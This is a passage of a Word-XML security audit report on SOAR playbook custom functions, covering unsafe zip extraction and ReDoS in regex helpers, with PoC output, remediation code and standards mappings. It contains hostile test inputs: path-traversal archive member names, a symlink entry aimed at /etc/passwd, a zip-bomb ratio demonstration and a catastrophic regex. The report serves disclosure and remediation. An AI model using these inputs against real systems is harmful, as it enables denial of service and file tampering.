          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ python3 -I run_poc.py &lt;W&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>member: '../../../pwned_rel.txt'  ... member: '../../../../../../../../pwned_deep.txt' ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>RETURNED output_files:</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.../tmp/deadbeef.../pwned_rel.txt</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.../tmp/deadbeef.../pwned_deep.txt</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.../tmp/deadbeef.../sub/pwned_mid.txt</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.../tmp/deadbeef.../normal/benign.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>All files anywhere under sandbox_root:</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opt/phantom/vault/tmp/deadbeef.../{pwned_rel,pwned_deep,sub/pwned_mid,normal/benign}.txt   (no "ESCAPED" line)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Symlink entry extracted as a plain file (no escape):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ python3 -I zip_behaviour.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>symlink entry extracted as symlink?  False</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>extracted as regular file?  True   content bytes: b'/etc/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Decompression ratio with no guard:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>10 MiB zero file -&gt; compressed zip size: 10315 bytes (ratio ~1016:1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>zip_extract applies NO size/ratio/count cap before extractall() -&gt; decompression DoS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (full replacement of the extraction block):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>MAX_TOTAL_UNCOMPRESSED = 512 * 1024 * 1024   # 512 MiB cap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>MAX_FILES = 10000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>MAX_RATIO = 100                              # per-member compression ratio cap</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>with zipfile.ZipFile(info[0]["path"]) as f_zip:</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infos = f_zip.infolist()</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if len(infos) &gt; MAX_FILES:</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raise ValueError("archive has too many members")</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total = 0</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for zi in infos:</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total += zi.file_size</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if total &gt; MAX_TOTAL_UNCOMPRESSED:</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raise ValueError("archive uncompressed size exceeds cap")</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if zi.compress_size and zi.file_size / zi.compress_size &gt; MAX_RATIO:</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raise ValueError(f"suspicious compression ratio for {zi.filename}")</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 explicit traversal guard (defense in depth even though CPython sanitizes)</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dest = (extract_path / zi.filename).resolve()</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if not str(dest).startswith(str(extract_path.resolve()) + os.sep):</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raise ValueError(f"unsafe member path: {zi.filename}")</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try:</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f_zip.extractall(str(extract_path), pwd=password.encode() if password else None)</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for p in extract_path.rglob("*"):</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if p.is_file() and not p.is_symlink():</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ok, msg, vid = phantom.vault_add(container=container_id,</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file_location=str(p), file_name=p.name)</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if not ok:</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raise RuntimeError(f"vault_add failed for {p}: {msg}")</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outputs['output_files'].append(</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{'file_path': str(p), 'file_name': p.name, 'vault_id': vid})</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finally:</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shutil.rmtree(extract_path, ignore_errors=True)   # always clean up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Caps stop the bomb before the disk fills; the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>finally: rmtree</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> removes the temp tree; the explicit path check and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>not p.is_symlink()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are belt-and-suspenders. Functionality for legitimate archives is unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-409 Improper Handling of Highly Compressed Data (Data Amplification); CWE-400 Uncontrolled Resource Consumption (2024 CWE Top 25 #24); CWE-459. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration, A06:2021 Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1499 Endpoint Denial of Service. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SC-5 Denial-of-Service Protection, SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding, A.8.6 Capacity management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / File Management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-05 — ReDoS via user-supplied regex compiled in regex_filter_list and regex_split</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.3). Exploitability: Conditionally exploitable (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/regex_filter_list.py:30; regex_split.py:34-35</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Both functions compile a caller-supplied regular expression on every item with no validation, length cap, or timeout. Python's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has no built-in backtracking limit, so a catastrophic pattern (or a benign-but-vulnerable pattern applied to attacker-controlled items) hangs the playbook thread. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>regex_split</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">'s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>replace('\\\\','\\')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also silently rewrites the pattern, which can turn a valid escape into an invalid one (raising </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>re.error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) or change its meaning. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>regex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and/or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>item</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>input_string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from CEF data → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>re.match</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>re.split</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — exponential blow-up requires a vulnerable pattern; if the playbook sources </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>regex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from an artifact this is directly attacker-controlled, otherwise an attacker-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>item</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> against a fixed vulnerable pattern suffices. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ python3 -I regex_user.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>re.match('(a+)+$', 'a'*22+'!')   0.249s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>re.match('(a+)+$', 'a'*26+'!')   3.283s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>re.match('(a+)+$', 'a'*30+'!')   TIMEOUT &gt;15s (catastrophic)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: validate/compile once, cap input length, and enforce a wall-clock budget (the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>regex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> third-party module supports </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>timeout=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; or run in a worker with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>signal.alarm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the SOAR node):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if not isinstance(regex, str) or len(regex) &gt; 512:</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raise ValueError("regex missing or too long")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>try:</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compiled = re.compile(regex)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>except re.error as e:</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raise ValueError(f"invalid regex: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>MAX_ITEM = 4096</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for item in input_list:</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s = str(item)</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if len(s) &gt; MAX_ITEM:</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raise ValueError("item too long to match safely")</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if compiled.search(s):   # see CF-06 re match vs search</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">For a hard guarantee use the PyPI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>regex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> module with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>compiled.match(s, timeout=1.0)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1333 Inefficient Regular Expression Complexity (ReDoS); CWE-400 Uncontrolled Resource Consumption (2024 CWE Top 25 #24). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A06:2021 Vulnerable and Outdated Components, A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1499 Endpoint Denial of Service. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SC-5 Denial-of-Service Protection, SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-07 — regex_extract_email: polynomial backtracking and incorrect extraction of attacker-controlled domains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.3). Exploitability: Exploitable for DoS (PoC executed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/regex_extract_email.py:24-31</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
